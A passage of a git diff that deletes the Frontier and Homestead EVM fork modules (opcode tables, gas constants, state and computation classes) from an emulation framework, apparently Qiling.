import ( - GAS_CODEDEPOSIT, - STACK_DEPTH_LIMIT, -) - -from ...._utils.address import force_bytes_to_address -from ....abc import ( - ComputationAPI, - MessageAPI, - StateAPI, - TransactionContextAPI, -) -from ....exceptions import ( - OutOfGas, - InsufficientFunds, - StackDepthLimit, -) -from ....vm.computation import BaseComputation -from .opcodes import FRONTIER_OPCODES - - -FRONTIER_PRECOMPILES = { - force_bytes_to_address(b'\x01'): precompiles.ecrecover, - force_bytes_to_address(b'\x02'): precompiles.sha256, - force_bytes_to_address(b'\x03'): precompiles.ripemd160, - force_bytes_to_address(b'\x04'): precompiles.identity, -} - - -class FrontierComputation(BaseComputation): - """ - A class for all execution computations in the ``Frontier`` fork. - Inherits from :class:`~eth.vm.computation.BaseComputation` - """ - # Override - opcodes = FRONTIER_OPCODES - _precompiles = FRONTIER_PRECOMPILES # type: ignore # https://github.com/python/mypy/issues/708 # noqa: E501 - - @classmethod - def apply_message( - cls, - state: StateAPI, - message: MessageAPI, - transaction_context: TransactionContextAPI) -> ComputationAPI: - - snapshot = state.snapshot() - - if message.depth > STACK_DEPTH_LIMIT: - raise StackDepthLimit("Stack depth limit reached") - - if message.should_transfer_value and message.value: - sender_balance = state.get_balance(message.sender) - - if sender_balance < message.value: - raise InsufficientFunds( - f"Insufficient funds: {sender_balance} < {message.value}" - ) - - state.delta_balance(message.sender, -1 * message.value) - state.delta_balance(message.storage_address, message.value) - - state.touch_account(message.storage_address) - - # computation = cls.apply_computation( - # state, - # message, - # transaction_context, - # ) - computation = cls(state, message, transaction_context) - executor = EVMExecutor(computation) - computation = run_debugger(executor) if state.ql.debugger == True else executor.execute() - - if computation.is_error: - state.revert(snapshot) - else: - state.commit(snapshot) - - return computation - - @classmethod - def apply_create_message( - cls, - state: StateAPI, - message: MessageAPI, - transaction_context: TransactionContextAPI) -> ComputationAPI: - - computation = cls.apply_message(state, message, transaction_context) - - if computation.is_error: - return computation - else: - contract_code = computation.output - - if contract_code: - contract_code_gas_fee = len(contract_code) * GAS_CODEDEPOSIT - try: - computation.consume_gas( - contract_code_gas_fee, - reason="Write contract code for CREATE", - ) - except OutOfGas: - computation.output = b'' - else: - state.set_code(message.storage_address, contract_code) - return computation diff --git a/qiling/arch/evm/vm/forks/frontier/constants.py b/qiling/arch/evm/vm/forks/frontier/constants.py deleted file mode 100644 index 8b669cb26..000000000 --- a/qiling/arch/evm/vm/forks/frontier/constants.py +++ /dev/null @@ -1,40 +0,0 @@ -from eth_typing import ( - Address -) -from ....constants import ( - GAS_TX, - GAS_TXDATAZERO, - GAS_TXDATANONZERO, -) -from ...._utils.transactions import IntrinsicGasSchedule - - -CREATE_CONTRACT_ADDRESS = Address(b'') - - -# -# Difficulty -# -FRONTIER_DIFFICULTY_ADJUSTMENT_CUTOFF = 13 - - -# -# Stack Limit -# -STACK_DEPTH_LIMIT = 1024 - - -# -# Gas Costs and Refunds -# -REFUND_SELFDESTRUCT = 24000 -GAS_CODEDEPOSIT = 200 - - - -FRONTIER_TX_GAS_SCHEDULE = IntrinsicGasSchedule( - gas_tx=GAS_TX, - gas_txcreate=0, - gas_txdatazero=GAS_TXDATAZERO, - gas_txdatanonzero=GAS_TXDATANONZERO, -) \ No newline at end of file diff --git a/qiling/arch/evm/vm/forks/frontier/opcodes.py b/qiling/arch/evm/vm/forks/frontier/opcodes.py deleted file mode 100644 index bc3064d44..000000000 --- a/qiling/arch/evm/vm/forks/frontier/opcodes.py +++ /dev/null @@ -1,708 +0,0 @@ -from typing import Dict - -from .... import constants - -from ....abc import OpcodeAPI -from ....vm import mnemonics -from ....vm import opcode_values -from ....vm.logic import ( - arithmetic, - block, - call, - comparison, - context, - duplication, - flow, - logging, - memory, - sha3, - stack, - storage, - swap, - system, -) -from ....vm.opcode import ( - as_opcode, -) - - -FRONTIER_OPCODES: Dict[int, OpcodeAPI] = { - # - # Arithmetic - # - opcode_values.STOP: as_opcode( - logic_fn=flow.stop, - mnemonic=mnemonics.STOP, - gas_cost=constants.GAS_ZERO, - ), - opcode_values.ADD: as_opcode( - logic_fn=arithmetic.add, - mnemonic=mnemonics.ADD, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.MUL: as_opcode( - logic_fn=arithmetic.mul, - mnemonic=mnemonics.MUL, - gas_cost=constants.GAS_LOW, - ), - opcode_values.SUB: as_opcode( - logic_fn=arithmetic.sub, - mnemonic=mnemonics.SUB, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.DIV: as_opcode( - logic_fn=arithmetic.div, - mnemonic=mnemonics.DIV, - gas_cost=constants.GAS_LOW, - ), - opcode_values.SDIV: as_opcode( - logic_fn=arithmetic.sdiv, - mnemonic=mnemonics.SDIV, - gas_cost=constants.GAS_LOW, - ), - opcode_values.MOD: as_opcode( - logic_fn=arithmetic.mod, - mnemonic=mnemonics.MOD, - gas_cost=constants.GAS_LOW, - ), - opcode_values.SMOD: as_opcode( - logic_fn=arithmetic.smod, - mnemonic=mnemonics.SMOD, - gas_cost=constants.GAS_LOW, - ), - opcode_values.ADDMOD: as_opcode( - logic_fn=arithmetic.addmod, - mnemonic=mnemonics.ADDMOD, - gas_cost=constants.GAS_MID, - ), - opcode_values.MULMOD: as_opcode( - logic_fn=arithmetic.mulmod, - mnemonic=mnemonics.MULMOD, - gas_cost=constants.GAS_MID, - ), - opcode_values.EXP: as_opcode( - logic_fn=arithmetic.exp(gas_per_byte=constants.GAS_EXPBYTE), - mnemonic=mnemonics.EXP, - gas_cost=constants.GAS_EXP, - ), - opcode_values.SIGNEXTEND: as_opcode( - logic_fn=arithmetic.signextend, - mnemonic=mnemonics.SIGNEXTEND, - gas_cost=constants.GAS_LOW, - ), - # - # Comparisons - # - opcode_values.LT: as_opcode( - logic_fn=comparison.lt, - mnemonic=mnemonics.LT, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.GT: as_opcode( - logic_fn=comparison.gt, - mnemonic=mnemonics.GT, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.SLT: as_opcode( - logic_fn=comparison.slt, - mnemonic=mnemonics.SLT, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.SGT: as_opcode( - logic_fn=comparison.sgt, - mnemonic=mnemonics.SGT, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.EQ: as_opcode( - logic_fn=comparison.eq, - mnemonic=mnemonics.EQ, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.ISZERO: as_opcode( - logic_fn=comparison.iszero, - mnemonic=mnemonics.ISZERO, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.AND: as_opcode( - logic_fn=comparison.and_op, - mnemonic=mnemonics.AND, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.OR: as_opcode( - logic_fn=comparison.or_op, - mnemonic=mnemonics.OR, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.XOR: as_opcode( - logic_fn=comparison.xor, - mnemonic=mnemonics.XOR, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.NOT: as_opcode( - logic_fn=comparison.not_op, - mnemonic=mnemonics.NOT, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.BYTE: as_opcode( - logic_fn=comparison.byte_op, - mnemonic=mnemonics.BYTE, - gas_cost=constants.GAS_VERYLOW, - ), - # - # Sha3 - # - opcode_values.SHA3: as_opcode( - logic_fn=sha3.sha3, - mnemonic=mnemonics.SHA3, - gas_cost=constants.GAS_SHA3, - ), - # - # Environment Information - # - opcode_values.ADDRESS: as_opcode( - logic_fn=context.address, - mnemonic=mnemonics.ADDRESS, - gas_cost=constants.GAS_BASE, - ), - opcode_values.BALANCE: as_opcode( - logic_fn=context.balance, - mnemonic=mnemonics.BALANCE, - gas_cost=constants.GAS_BALANCE, - ), - opcode_values.ORIGIN: as_opcode( - logic_fn=context.origin, - mnemonic=mnemonics.ORIGIN, - gas_cost=constants.GAS_BASE, - ), - opcode_values.CALLER: as_opcode( - logic_fn=context.caller, - mnemonic=mnemonics.CALLER, - gas_cost=constants.GAS_BASE, - ), - opcode_values.CALLVALUE: as_opcode( - logic_fn=context.callvalue, - mnemonic=mnemonics.CALLVALUE, - gas_cost=constants.GAS_BASE, - ), - opcode_values.CALLDATALOAD: as_opcode( - logic_fn=context.calldataload, - mnemonic=mnemonics.CALLDATALOAD, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.CALLDATASIZE: as_opcode( - logic_fn=context.calldatasize, - mnemonic=mnemonics.CALLDATASIZE, - gas_cost=constants.GAS_BASE, - ), - opcode_values.CALLDATACOPY: as_opcode( - logic_fn=context.calldatacopy, - mnemonic=mnemonics.CALLDATACOPY, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.CODESIZE: as_opcode( - logic_fn=context.codesize, - mnemonic=mnemonics.CODESIZE, - gas_cost=constants.GAS_BASE, - ), - opcode_values.CODECOPY: as_opcode( - logic_fn=context.codecopy, - mnemonic=mnemonics.CODECOPY, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.GASPRICE: as_opcode( - logic_fn=context.gasprice, - mnemonic=mnemonics.GASPRICE, - gas_cost=constants.GAS_BASE, - ), - opcode_values.EXTCODESIZE: as_opcode( - logic_fn=context.extcodesize, - mnemonic=mnemonics.EXTCODESIZE, - gas_cost=constants.GAS_EXTCODE, - ), - opcode_values.EXTCODECOPY: as_opcode( - logic_fn=context.extcodecopy, - mnemonic=mnemonics.EXTCODECOPY, - gas_cost=constants.GAS_EXTCODE, - ), - # - # Block Information - # - opcode_values.BLOCKHASH: as_opcode( - logic_fn=block.blockhash, - mnemonic=mnemonics.BLOCKHASH, - gas_cost=constants.GAS_BLOCKHASH, - ), - opcode_values.COINBASE: as_opcode( - logic_fn=block.coinbase, - mnemonic=mnemonics.COINBASE, - gas_cost=constants.GAS_BASE, - ), - opcode_values.TIMESTAMP: as_opcode( - logic_fn=block.timestamp, - mnemonic=mnemonics.TIMESTAMP, - gas_cost=constants.GAS_BASE, - ), - opcode_values.NUMBER: as_opcode( - logic_fn=block.number, - mnemonic=mnemonics.NUMBER, - gas_cost=constants.GAS_BASE, - ), - opcode_values.DIFFICULTY: as_opcode( - logic_fn=block.difficulty, - mnemonic=mnemonics.DIFFICULTY, - gas_cost=constants.GAS_BASE, - ), - opcode_values.GASLIMIT: as_opcode( - logic_fn=block.gaslimit, - mnemonic=mnemonics.GASLIMIT, - gas_cost=constants.GAS_BASE, - ), - # - # Stack, Memory, Storage and Flow Operations - # - opcode_values.POP: as_opcode( - logic_fn=stack.pop, - mnemonic=mnemonics.POP, - gas_cost=constants.GAS_BASE, - ), - opcode_values.MLOAD: as_opcode( - logic_fn=memory.mload, - mnemonic=mnemonics.MLOAD, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.MSTORE: as_opcode( - logic_fn=memory.mstore, - mnemonic=mnemonics.MSTORE, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.MSTORE8: as_opcode( - logic_fn=memory.mstore8, - mnemonic=mnemonics.MSTORE8, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.SLOAD: as_opcode( - logic_fn=storage.sload, - mnemonic=mnemonics.SLOAD, - gas_cost=constants.GAS_SLOAD, - ), - opcode_values.SSTORE: as_opcode( - logic_fn=storage.sstore, - mnemonic=mnemonics.SSTORE, - gas_cost=constants.GAS_NULL, - ), - opcode_values.JUMP: as_opcode( - logic_fn=flow.jump, - mnemonic=mnemonics.JUMP, - gas_cost=constants.GAS_MID, - ), - opcode_values.JUMPI: as_opcode( - logic_fn=flow.jumpi, - mnemonic=mnemonics.JUMPI, - gas_cost=constants.GAS_HIGH, - ), - opcode_values.PC: as_opcode( - logic_fn=flow.program_counter, - mnemonic=mnemonics.PC, - gas_cost=constants.GAS_BASE, - ), - opcode_values.MSIZE: as_opcode( - logic_fn=memory.msize, - mnemonic=mnemonics.MSIZE, - gas_cost=constants.GAS_BASE, - ), - opcode_values.GAS: as_opcode( - logic_fn=flow.gas, - mnemonic=mnemonics.GAS, - gas_cost=constants.GAS_BASE, - ), - opcode_values.JUMPDEST: as_opcode( - logic_fn=flow.jumpdest, - mnemonic=mnemonics.JUMPDEST, - gas_cost=constants.GAS_JUMPDEST, - ), - # - # Push Operations - # - opcode_values.PUSH1: as_opcode( - logic_fn=stack.push1, - mnemonic=mnemonics.PUSH1, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH2: as_opcode( - logic_fn=stack.push2, - mnemonic=mnemonics.PUSH2, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH3: as_opcode( - logic_fn=stack.push3, - mnemonic=mnemonics.PUSH3, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH4: as_opcode( - logic_fn=stack.push4, - mnemonic=mnemonics.PUSH4, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH5: as_opcode( - logic_fn=stack.push5, - mnemonic=mnemonics.PUSH5, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH6: as_opcode( - logic_fn=stack.push6, - mnemonic=mnemonics.PUSH6, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH7: as_opcode( - logic_fn=stack.push7, - mnemonic=mnemonics.PUSH7, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH8: as_opcode( - logic_fn=stack.push8, - mnemonic=mnemonics.PUSH8, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH9: as_opcode( - logic_fn=stack.push9, - mnemonic=mnemonics.PUSH9, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH10: as_opcode( - logic_fn=stack.push10, - mnemonic=mnemonics.PUSH10, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH11: as_opcode( - logic_fn=stack.push11, - mnemonic=mnemonics.PUSH11, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH12: as_opcode( - logic_fn=stack.push12, - mnemonic=mnemonics.PUSH12, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH13: as_opcode( - logic_fn=stack.push13, - mnemonic=mnemonics.PUSH13, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH14: as_opcode( - logic_fn=stack.push14, - mnemonic=mnemonics.PUSH14, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH15: as_opcode( - logic_fn=stack.push15, - mnemonic=mnemonics.PUSH15, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH16: as_opcode( - logic_fn=stack.push16, - mnemonic=mnemonics.PUSH16, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH17: as_opcode( - logic_fn=stack.push17, - mnemonic=mnemonics.PUSH17, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH18: as_opcode( - logic_fn=stack.push18, - mnemonic=mnemonics.PUSH18, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH19: as_opcode( - logic_fn=stack.push19, - mnemonic=mnemonics.PUSH19, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH20: as_opcode( - logic_fn=stack.push20, - mnemonic=mnemonics.PUSH20, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH21: as_opcode( - logic_fn=stack.push21, - mnemonic=mnemonics.PUSH21, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH22: as_opcode( - logic_fn=stack.push22, - mnemonic=mnemonics.PUSH22, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH23: as_opcode( - logic_fn=stack.push23, - mnemonic=mnemonics.PUSH23, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH24: as_opcode( - logic_fn=stack.push24, - mnemonic=mnemonics.PUSH24, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH25: as_opcode( - logic_fn=stack.push25, - mnemonic=mnemonics.PUSH25, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH26: as_opcode( - logic_fn=stack.push26, - mnemonic=mnemonics.PUSH26, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH27: as_opcode( - logic_fn=stack.push27, - mnemonic=mnemonics.PUSH27, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH28: as_opcode( - logic_fn=stack.push28, - mnemonic=mnemonics.PUSH28, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH29: as_opcode( - logic_fn=stack.push29, - mnemonic=mnemonics.PUSH29, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH30: as_opcode( - logic_fn=stack.push30, - mnemonic=mnemonics.PUSH30, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH31: as_opcode( - logic_fn=stack.push31, - mnemonic=mnemonics.PUSH31, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.PUSH32: as_opcode( - logic_fn=stack.push32, - mnemonic=mnemonics.PUSH32, - gas_cost=constants.GAS_VERYLOW, - ), - # - # Duplicate Operations - # - opcode_values.DUP1: as_opcode( - logic_fn=duplication.dup1, - mnemonic=mnemonics.DUP1, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.DUP2: as_opcode( - logic_fn=duplication.dup2, - mnemonic=mnemonics.DUP2, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.DUP3: as_opcode( - logic_fn=duplication.dup3, - mnemonic=mnemonics.DUP3, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.DUP4: as_opcode( - logic_fn=duplication.dup4, - mnemonic=mnemonics.DUP4, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.DUP5: as_opcode( - logic_fn=duplication.dup5, - mnemonic=mnemonics.DUP5, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.DUP6: as_opcode( - logic_fn=duplication.dup6, - mnemonic=mnemonics.DUP6, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.DUP7: as_opcode( - logic_fn=duplication.dup7, - mnemonic=mnemonics.DUP7, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.DUP8: as_opcode( - logic_fn=duplication.dup8, - mnemonic=mnemonics.DUP8, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.DUP9: as_opcode( - logic_fn=duplication.dup9, - mnemonic=mnemonics.DUP9, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.DUP10: as_opcode( - logic_fn=duplication.dup10, - mnemonic=mnemonics.DUP10, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.DUP11: as_opcode( - logic_fn=duplication.dup11, - mnemonic=mnemonics.DUP11, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.DUP12: as_opcode( - logic_fn=duplication.dup12, - mnemonic=mnemonics.DUP12, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.DUP13: as_opcode( - logic_fn=duplication.dup13, - mnemonic=mnemonics.DUP13, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.DUP14: as_opcode( - logic_fn=duplication.dup14, - mnemonic=mnemonics.DUP14, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.DUP15: as_opcode( - logic_fn=duplication.dup15, - mnemonic=mnemonics.DUP15, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.DUP16: as_opcode( - logic_fn=duplication.dup16, - mnemonic=mnemonics.DUP16, - gas_cost=constants.GAS_VERYLOW, - ), - # - # Exchange Operations - # - opcode_values.SWAP1: as_opcode( - logic_fn=swap.swap1, - mnemonic=mnemonics.SWAP1, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.SWAP2: as_opcode( - logic_fn=swap.swap2, - mnemonic=mnemonics.SWAP2, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.SWAP3: as_opcode( - logic_fn=swap.swap3, - mnemonic=mnemonics.SWAP3, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.SWAP4: as_opcode( - logic_fn=swap.swap4, - mnemonic=mnemonics.SWAP4, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.SWAP5: as_opcode( - logic_fn=swap.swap5, - mnemonic=mnemonics.SWAP5, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.SWAP6: as_opcode( - logic_fn=swap.swap6, - mnemonic=mnemonics.SWAP6, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.SWAP7: as_opcode( - logic_fn=swap.swap7, - mnemonic=mnemonics.SWAP7, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.SWAP8: as_opcode( - logic_fn=swap.swap8, - mnemonic=mnemonics.SWAP8, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.SWAP9: as_opcode( - logic_fn=swap.swap9, - mnemonic=mnemonics.SWAP9, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.SWAP10: as_opcode( - logic_fn=swap.swap10, - mnemonic=mnemonics.SWAP10, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.SWAP11: as_opcode( - logic_fn=swap.swap11, - mnemonic=mnemonics.SWAP11, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.SWAP12: as_opcode( - logic_fn=swap.swap12, - mnemonic=mnemonics.SWAP12, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.SWAP13: as_opcode( - logic_fn=swap.swap13, - mnemonic=mnemonics.SWAP13, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.SWAP14: as_opcode( - logic_fn=swap.swap14, - mnemonic=mnemonics.SWAP14, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.SWAP15: as_opcode( - logic_fn=swap.swap15, - mnemonic=mnemonics.SWAP15, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.SWAP16: as_opcode( - logic_fn=swap.swap16, - mnemonic=mnemonics.SWAP16, - gas_cost=constants.GAS_VERYLOW, - ), - # - # Logging - # - opcode_values.LOG0: as_opcode( - logic_fn=logging.log0, - mnemonic=mnemonics.LOG0, - gas_cost=constants.GAS_LOG, - ), - opcode_values.LOG1: as_opcode( - logic_fn=logging.log1, - mnemonic=mnemonics.LOG1, - gas_cost=constants.GAS_LOG, - ), - opcode_values.LOG2: as_opcode( - logic_fn=logging.log2, - mnemonic=mnemonics.LOG2, - gas_cost=constants.GAS_LOG, - ), - opcode_values.LOG3: as_opcode( - logic_fn=logging.log3, - mnemonic=mnemonics.LOG3, - gas_cost=constants.GAS_LOG, - ), - opcode_values.LOG4: as_opcode( - logic_fn=logging.log4, - mnemonic=mnemonics.LOG4, - gas_cost=constants.GAS_LOG, - ), - # - # System - # - opcode_values.CREATE: system.Create.configure( - __name__='opcode:CREATE', - mnemonic=mnemonics.CREATE, - gas_cost=constants.GAS_CREATE, - )(), - opcode_values.CALL: call.Call.configure( - __name__='opcode:CALL', - mnemonic=mnemonics.CALL, - gas_cost=constants.GAS_CALL, - )(), - opcode_values.CALLCODE: call.CallCode.configure( - __name__='opcode:CALLCODE', - mnemonic=mnemonics.CALLCODE, - gas_cost=constants.GAS_CALL, - )(), - opcode_values.RETURN: as_opcode( - logic_fn=system.return_op, - mnemonic=mnemonics.RETURN, - gas_cost=constants.GAS_ZERO, - ), - opcode_values.SELFDESTRUCT: as_opcode( - logic_fn=system.selfdestruct, - mnemonic=mnemonics.SELFDESTRUCT, - gas_cost=constants.GAS_SELFDESTRUCT, - ), -} diff --git a/qiling/arch/evm/vm/forks/frontier/state.py b/qiling/arch/evm/vm/forks/frontier/state.py deleted file mode 100644 index d8d8457d0..000000000 --- a/qiling/arch/evm/vm/forks/frontier/state.py +++ /dev/null @@ -1,144 +0,0 @@ -from ...utils import bytecode_to_bytes, runtime_code_detector -from ...._utils.transactions import calculate_intrinsic_gas -from typing import Type - -from eth_typing.evm import Address -from eth_utils import encode_hex -from ....abc import ( - AccountDatabaseAPI, - ComputationAPI, - MessageAPI, - TransactionContextAPI, - TransactionExecutorAPI, -) -from ....constants import CREATE_CONTRACT_ADDRESS -from ....db.account import AccountDB -from ....exceptions import ContractCreationCollision -from ...._utils.address import generate_contract_address -from ....vm.message import Message -from ....vm.state import BaseState, BaseTransactionExecutor -from .computation import FrontierComputation -from .constants import FRONTIER_TX_GAS_SCHEDULE, REFUND_SELFDESTRUCT -from .transaction_context import FrontierTransactionContext - - -class FrontierTransactionExecutor(BaseTransactionExecutor): - def build_evm_message(self, - origin: Address, - gas_price: int, - gas: int, - to: Address, - sender: Address, - value: int, - data: bytes, - code: bytes, - code_address: Address = None, - contract_address: Address = None) -> MessageAPI: - - if origin is None: - origin = sender - - gas_fee = gas_price * gas - self.vm_state.delta_balance(sender, -1 * gas_fee) - self.vm_state.increment_nonce(sender) - - - message_gas = gas - calculate_intrinsic_gas(data, to, FRONTIER_TX_GAS_SCHEDULE) - - if to == CREATE_CONTRACT_ADDRESS and contract_address is None: - contract_address = generate_contract_address( - sender, - self.vm_state.get_nonce(sender), - ) - # elif to != CREATE_CONTRACT_ADDRESS and self.vm_state.get_code(to) != b'': - # contract_address = to - # auxcode = self.vm_state.get_code(to) - # rtcode, _, _ = runtime_code_detector(bytecode_to_bytes(auxcode)) - # code = bytecode_to_bytes(rtcode) - - message = Message( - gas=message_gas, - to=to, - sender=sender, - value=value, - data=data, - code=code, - code_address=code_address, - create_address=contract_address, - gas_price=gas_price - ) - - return message - - def build_computation(self, - message: MessageAPI) -> ComputationAPI: - transaction_context = self.vm_state.get_transaction_context(message) - if message.is_create: - is_collision = self.vm_state.has_code_or_nonce( - message.storage_address - ) - - if is_collision: - # The address of the newly created contract has *somehow* collided - # with an existing contract address. - computation = self.vm_state.get_computation(message, transaction_context) - computation.error = ContractCreationCollision( - f"Address collision while creating contract: " - f"{encode_hex(message.storage_address)}" - ) - else: - computation = self.vm_state.computation_class.apply_create_message( - self.vm_state, - message, - transaction_context, - ) - else: - computation = self.vm_state.computation_class.apply_message( - self.vm_state, - message, - transaction_context, - ) - - return computation - - def finalize_computation(self, - message: MessageAPI, - computation: ComputationAPI) -> ComputationAPI: - # Self Destruct Refunds - num_deletions = len(computation.get_accounts_for_deletion()) - if num_deletions: - computation.refund_gas(REFUND_SELFDESTRUCT * num_deletions) - - # Gas Refunds - gas_remaining = computation.get_gas_remaining() - gas_refunded = computation.get_gas_refund() - gas_used = message.gas - gas_remaining - gas_refund = min(gas_refunded, gas_used // 2) - gas_refund_amount = (gas_refund + gas_remaining) * message.gas_price - - if gas_refund_amount: - self.vm_state.delta_balance(computation.msg.sender, gas_refund_amount) - - # Miner Fees - transaction_fee = \ - (message.gas - gas_remaining - gas_refund) * message.gas_price - self.vm_state.delta_balance(self.vm_state.coinbase, transaction_fee) - - # Process Self Destructs - for account, _ in computation.get_accounts_for_deletion(): - # TODO: need to figure out how we prevent multiple selfdestructs from - # the same account and if this is the right place to put this. - - # TODO: this balance setting is likely superflous and can be - # removed since `delete_account` does this. - self.vm_state.set_balance(account, 0) - self.vm_state.delete_account(account) - - return computation - - -class FrontierState(BaseState): - computation_class: Type[ComputationAPI] = FrontierComputation - transaction_context_class: Type[TransactionContextAPI] = FrontierTransactionContext - account_db_class: Type[AccountDatabaseAPI] = AccountDB - transaction_executor_class: Type[TransactionExecutorAPI] = FrontierTransactionExecutor diff --git a/qiling/arch/evm/vm/forks/frontier/transaction_context.py b/qiling/arch/evm/vm/forks/frontier/transaction_context.py deleted file mode 100644 index 1bccfae5b..000000000 --- a/qiling/arch/evm/vm/forks/frontier/transaction_context.py +++ /dev/null @@ -1,5 +0,0 @@ -from ....vm.transaction_context import BaseTransactionContext - - -class FrontierTransactionContext(BaseTransactionContext): - pass diff --git a/qiling/arch/evm/vm/forks/homestead/__init__.py b/qiling/arch/evm/vm/forks/homestead/__init__.py deleted file mode 100644 index 4d4bef37e..000000000 --- a/qiling/arch/evm/vm/forks/homestead/__init__.py +++ /dev/null @@ -1,9 +0,0 @@ -from ..frontier import FrontierVM -from .state import HomesteadState - -class HomesteadVM(FrontierVM): - # fork name - fork: str = 'homestead' # noqa: E701 # flake8 bug that's fixed in 3.6.0+ - - # classes - _state_class = HomesteadState diff --git a/qiling/arch/evm/vm/forks/homestead/computation.py b/qiling/arch/evm/vm/forks/homestead/computation.py deleted file mode 100644 index 1ba6f0fd5..000000000 --- a/qiling/arch/evm/vm/forks/homestead/computation.py +++ /dev/null @@ -1,65 +0,0 @@ -from eth_hash.auto import keccak - -from .... import constants -from ....exceptions import ( - OutOfGas, -) -from eth_utils import ( - encode_hex, -) - -from ....abc import ( - ComputationAPI, - MessageAPI, - StateAPI, - TransactionContextAPI, -) -from ....vm.forks.frontier.computation import ( - FrontierComputation, -) - -from .opcodes import HOMESTEAD_OPCODES - - -class HomesteadComputation(FrontierComputation): - """ - A class for all execution computations in the ``Frontier`` fork. - Inherits from :class:`~eth.vm.forks.frontier.computation.FrontierComputation` - """ - # Override - opcodes = HOMESTEAD_OPCODES - - @classmethod - def apply_create_message( - cls, - state: StateAPI, - message: MessageAPI, - transaction_context: TransactionContextAPI) -> ComputationAPI: - snapshot = state.snapshot() - - computation = cls.apply_message(state, message, transaction_context) - - if computation.is_error: - state.revert(snapshot) - return computation - else: - contract_code = computation.output - - if contract_code: - contract_code_gas_cost = len(contract_code) * constants.GAS_CODEDEPOSIT - try: - computation.consume_gas( - contract_code_gas_cost, - reason="Write contract code for CREATE", - ) - except OutOfGas as err: - # Different from Frontier: reverts state on gas failure while - # writing contract code. - computation.error = err - state.revert(snapshot) - else: - state.set_code(message.storage_address, contract_code) - state.commit(snapshot) - else: - state.commit(snapshot) - return computation diff --git a/qiling/arch/evm/vm/forks/homestead/constants.py b/qiling/arch/evm/vm/forks/homestead/constants.py deleted file mode 100644 index e81f269b3..000000000 --- a/qiling/arch/evm/vm/forks/homestead/constants.py +++ 